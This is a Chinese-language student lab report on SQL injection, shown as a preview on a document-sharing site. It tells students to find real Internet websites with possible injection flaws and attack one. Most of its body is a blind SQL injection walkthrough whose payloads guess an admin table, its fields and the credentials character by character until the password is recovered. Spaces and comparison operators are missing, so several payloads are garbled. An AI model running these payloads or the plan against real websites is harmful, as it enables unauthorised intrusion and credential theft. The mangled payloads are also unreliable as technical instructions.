SQL注入攻击实验报告

整理文档很辛苦,赏杯茶钱您下走!

免费阅读已结束,点击下载阅读编辑剩下 ...

阅读已结束,您可以下载文档离线阅读编辑

资源描述

SQL注入攻击报告院系:计算机与通信工程学院班级:信息安全10-02班实验目的通过SQL注入攻击,掌握网站的工作机制,认识到SQL注入攻击的防范措施,加强对Web攻击的防范。1.实验内容通过模拟SQL注入攻击获得某网站后台登陆密码。(1)端正学习目的,禁止恶意入侵,不可对他人网站造成不良影响。(2)寻找Internet上用ASP、PHP、JSP或者ASP.NET语言编写的动态网站,测试其是否存在SQL注入漏洞,选择一个可能存在漏洞的网站进行模拟攻击。(3)获得后台数据库中的存储网站用户和密码的数据表。(4)获得其中一对用户名和密码。(5)找到登陆后台系统的网页路径,用获得的用户名和密码验证是否能登陆。(6)为这个网站的SQL注入漏洞提出解决方案和防范办法。3.实验步骤解攻击方法在地址栏:and1=1查看漏洞是否存在,如果存在就正常返回该页,如果没有,则显示错误,继续假设这个站的数据库存在一个admin表在地址栏:and0(selectcount(*)fromadmin)返回页正常,假设成立了。下面来猜猜看一下管理员表里面有几个管理员ID:and1(selectcount(*)fromadmin)页面什么都没有。管理员的数量等于或者小于1个and1=(selectcount(*)fromadmin)输入=1没显示错误,说明此站点只有一个管理员。下面就是要继续猜测admin里面关于管理员用户名和密码的字段名称。and1=(selectcount(*)fromadminwherelen(username)0)用户名称字段猜解完成之后继续猜解密码字段and1=(selectcount(*)fromadminwherelen(password)0)password字段存在!我们已经知道了管理员表里面有3个字段id,user,password。id编号user用户名password密码下面继续的就是管理员用户名和密码的猜解了。先猜出长度!and1=(selectcount(*)fromadminwherelen(user)10)user字段长度小于10and1=(selectcount(*)fromadminwherelen(user)5)user字段长度不小于5慢慢的来,最后猜出长度等于6,请看下面,返回正常就说明猜解正确and1=(selectcount(*)fromadminwherelen(user)=6)下面猜密码,and1=(selectcount(*)fromadminwherelen(password)=10)猜出来密码10位,不要奇怪,现在网管都有防备的,所以密码上20位也不太奇怪了下面该做的就是把他们拆开来一个一个猜字母and1=(selectcount(*)fromadminwhereleft(user,1)=a)返回正常,第一位字母等于a,千万不要把大写和小写给搞错了哦~~呵呵,如果不a就继续猜其他的字符落,反正猜到返回正常就算OK了开始猜解帐号的第二位字符。and1=(selectcount(*)fromadminwhereleft(user,2)=ad)就这样一次加一个字符这样猜,猜到够你刚才猜出来的多少位了就对了,帐号就算出来了接着是10位密码and1=(selectcount(*)fromadminwhereleft(password,1)=a)经过无数次错误之后......=2499and1=(selectcount(*)fromadminwhereleft(password,10)=administra)结果密码是administra

1 / 3
下载文档,编辑使用

©2015-2020 m.777doc.com 三七文档.

备案号:鲁ICP备2024069028号-1 客服联系 QQ:2149211541

×
保存成功